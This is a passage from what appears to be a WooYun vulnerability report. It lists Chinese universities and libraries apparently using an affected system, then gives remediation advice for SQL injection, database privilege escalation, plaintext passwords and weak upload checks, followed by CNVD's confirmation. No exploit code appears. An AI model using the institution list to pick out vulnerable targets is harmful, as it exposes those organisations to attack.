| 黑龙江大学 |
| 黑龙江工程学院 |
| 黑龙江中医药大学 |
| 呼市电大 |
| 湖北大学 |
| 湖北第二师范学院 |
| 湖北工程学院 |
| 湖北工业大学 |
| 湖北工业职业技术学院 |
| 湖北经济学院 |
| 湖北警官学院 |
| 湖北科技学院 |
| 湖北理工学院 |
| 湖北民族学院 |
| 湖北汽车工业学院 |
| 湖北省社会科学院 |
| 湖北省图书馆 |
| 湖北师范学院 |
| 湖北文理学院 |
| 湖北医药学院 |
| 湖北职业技术学院 |
| 湖北中医学院 |
| 湖北中医药高等专科学校 |
| 湖南第一师范 |
| 湖南工学院 |
| 湖南广播电视大学 |
| 湖南科技大学 |
| 湖南农业大学 |
| 湖南商学院 |
| 湖南省图书馆 |
| 湖南省委党校湖南行政学院 |
| 湖南师范大学 |
| 湖南中医药大学 |
| 湖州区图书馆 |
| 湖州师范学院 |
| 华北电力大学 |
| 华北水利水电学院 |
| 华东交通大学 |
| 华东理工大学 |
| 华东师范大学 |
| 华东政法大学 |
| 华南理工大学 |
| 华南农业大学 |
| 华南师范大学 |
| 华中科技大学 |
| 华中科技大学文华学院 |
| 华中农业大学 |
| 华中师范大学 |
| 淮安信息职业技术学院 |
| 淮北师范大学 |
| 淮海工学院 |
| 淮南师范学院 |
| 淮阴工学院 |
| 淮阴师范学院 |
| 黄冈师范学院 |
| 黄冈图书馆 |
| 黄河科技学院 |
| 黄山学院 |
| 惠州慈云图书馆 |
| 惠州学院 |
| 霍林河电大 |
| 吉林财经大学 |
| 吉林大学 |
| 吉林工程技术师范学院 |
| 吉林化工学院 |
| 吉林建筑大学 |
| 吉林农业大学 |
| 吉林农业科技学院 |
| 吉林师范大学 |
| 吉林医药学院 |
| 吉首大学 |
| 集美大学 |
| 济南大学 |
| 济南市少儿图书馆 |
| 济南市图书馆 |
| 济宁学院 |
| 济宁医学院 |
| 暨南大学 |
| 佳木斯大学 |
| 嘉定区图书馆 |
| 嘉兴图书馆 |
| 嘉兴学院 |
| 江汉大学 |
| 江南大学 |
| 江苏财经职业技术学院 |
| 江苏广播电视大学 |
| 江苏海事职业技术学院 |
| 江苏建筑职业技术学院 |
| 江苏健康职业学院 |
| 江苏经贸职业技术学院 |
| 江苏农林职业技术学院 |
| 江苏农牧学院 |
| 江苏省淮阴商业学校 |
| 江苏师范大学 |
| 江苏食品职业技术学院 |
| 江西警察学院 |
| 江西科技师范大学 |
| 江西理工大学 |
| 江西农业大学 |
| 江西省图书馆 |
| 江西省委党校 |
| 江西师范大学 |
| 江西中医药大学 |
| 江阴市图书馆 |
| 解放军电子工程学院 |
| 解放军医学图书馆 |
| 金陵科技学院 |
| 金陵图书馆 |
| 晋中学院 |
| 荆楚理工学院 |
| 荆门图书馆 |
| 荆州职业技术学院 |
| 井冈山大学 |
| 景德镇市图书馆 |
| 景德镇陶瓷学院 |
| 静安区图书馆 |
| 九江市图书馆 |
| 九江学院 |
| 军事经济学院 |
| 开封市图书馆 |
| 昆明工业职业技术学院 |
| 昆明理工大学 |
| 昆明理工大学津桥学院 |
| 昆明市图书馆 |
| 昆明学院 |
| 昆明冶金高等专科学校 |
| 昆明医学院 |
| 兰州大学 |
| 兰州交通大学 |
| 兰州理工大学 |
| 兰州市图书馆 |
| 丽水图书馆 |
| 丽水学院 |
| 溧阳市图书馆 |
| 连云港师范高等专

修复方案:

应对措施如下:
1)对于SQL注入式漏洞解决方案是这样的在用户对系统进行操作时首先进行非法字符校验;
2)对数据库提权漏洞问题:一、采取数据库系统账号与应用账号分离即创建应用程序需要访问的账号;二、采取收缩权限并设置指定IP地址可以远程访问数据库;
3)对用户密码进行加密保存;
4)上传附件校验有黑名单转变成白名单方式。

版权声明:转载请注明来源 dloved@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-15 17:40

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无


漏洞评价:

评价